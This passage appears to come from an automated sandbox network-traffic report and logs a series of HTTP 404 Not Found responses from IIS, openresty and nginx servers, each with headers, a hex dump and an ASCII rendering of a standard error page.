Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:50:43 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:50:52 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:50:53 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:50:58 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:50:58 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:51:02 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:51:03 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:51:05 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:51:07 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:51:09 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable 